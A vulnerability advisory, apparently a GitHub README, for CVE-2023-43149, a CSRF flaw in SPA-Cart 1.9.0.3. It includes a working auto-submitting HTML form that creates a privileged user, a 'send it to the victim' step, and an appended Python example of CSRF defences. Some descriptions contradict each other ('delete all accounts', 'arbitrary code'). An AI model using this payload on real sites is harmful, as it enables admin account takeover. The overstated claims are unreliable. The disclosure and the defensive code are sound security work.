
CVE-2023-43149: GitHub - MinoTauro2020/CVE-2023-43149: CVE-2023-43149

SPA-Cart 1.9.0.3 is vulnerable to Cross Site Request Forgery (CSRF) that allows a remote attacker to add an admin user with role status.

# CVE-2023-43149

Author: Aitor Herrero Fuentes

Vendor: SPA-Cart

Vendor Homepage: https://spa-cart.com/

Software Link: https://demo.spa-cart.com/admin

Version: 1.9.0.3

Tested on: Windows 10 Pro

CSRF ADD ROOT ACCOUNT

A Cross-Site Request Forgery vulnerability in the application at demo.spa-cart.com allows a remote attacker to execute arbitrary code and add a malicious user with "role status" with one click.

A CSRF vulnerability occurs when a malicious actor can trick a victim into performing an action that they did not intend to perform. In this case, the malicious actor could trick the victim into clicking on a link or opening a file that contains malicious code. This code could then be used to delete all accounts.

POC

1 - Create a file with this code and save it as HTML (Attack Delete All Account)

```html
<html>
  <body>
    <form action="https://demo.spa-cart.com/admin/user/859" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="posted_data[firstname]" value="mal1" />
      <input type="hidden" name="posted_data[lastname]" value="mal2" />
      <input type="hidden" name="posted_data[phone]" value="156415641561" />
      <input type="hidden" name="posted_data[email]" value="[email protected]" />
      <input type="hidden" name="password" value="" />
      <input type="hidden" name="posted_data[usertype]" value="C" />
      <input type="hidden" name="posted_data[roleid]" value="1" />
      <input type="hidden" name="posted_data[status]" value="1" />
      <input type="hidden" name="posted_data[address]" value="" />
      <input type="hidden" name="posted_data[city]" value="" />
      <input type="hidden" name="posted_data[state]" value="" />
      <input type="hidden" name="posted_data[country]" value="AG" />
      <input type="hidden" name="posted_data[zipcode]" value="05584" />
      <input type="hidden" name="posted_data[pending_membershipid]" value="1" />
      <input type="hidden" name="posted_data[membershipid]" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```

2 - Example: test.html

3 - Send it to the victim

4 - When the victim opens the HTML file, test.html opens in their browser, and when they click the button, the request changes the data in their current session.
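The server-side check whose absence makes the request above succeed, as an added example that is not part of the original advisory or SPA-Cart's code: every state-changing request must come from the application's own origin and carry a per-session token. The function names and the `csrf_token` field are assumptions; the sample requests are constructed.

```python
import hmac
import secrets
from urllib.parse import urlsplit

SAFE_METHODS = {"GET", "HEAD", "OPTIONS"}
TRUSTED_ORIGIN = "https://demo.spa-cart.com"  # host taken from the PoC form action


def issue_token():
    """Per-session random token, stored server-side and embedded in each admin form."""
    return secrets.token_urlsafe(32)


def source_origin(headers):
    """Origin of the page that sent the request: Origin header, else Referer."""
    origin = headers.get("Origin")
    if origin:
        return origin  # browsers send "null" for opaque origins such as file:// pages
    referer = headers.get("Referer")
    if referer:
        parts = urlsplit(referer)
        return f"{parts.scheme}://{parts.netloc}"
    return None


def csrf_check(method, headers, form, session_token):
    """Return (allowed, reason) for one request in an authenticated session."""
    if method.upper() in SAFE_METHODS:
        return True, "safe method"
    if source_origin(headers) != TRUSTED_ORIGIN:
        return False, "cross-origin or missing Origin/Referer"
    sent = form.get("csrf_token", "")  # hypothetical hidden field name
    if not sent or not hmac.compare_digest(sent.encode(), session_token.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed requests: the forged POST sent by test.html, then the real admin form.
SESSION_TOKEN = issue_token()
PROFILE = {"posted_data[roleid]": "1", "posted_data[status]": "1"}
FORGED = ("POST", {"Origin": "null"}, dict(PROFILE))
SAME_SITE_NO_TOKEN = ("POST", {"Origin": TRUSTED_ORIGIN}, dict(PROFILE))
LEGIT = ("POST", {"Referer": TRUSTED_ORIGIN + "/admin/user/859"},
         {**PROFILE, "csrf_token": SESSION_TOKEN})

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("no token", SAME_SITE_NO_TOKEN), ("legit", LEGIT)):
        print(name, csrf_check(*req, SESSION_TOKEN))
```

Setting the session cookie with `SameSite=Lax` or `SameSite=Strict` adds a browser-side layer, since the cookie is then withheld from cross-site POSTs like the one in the PoC.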
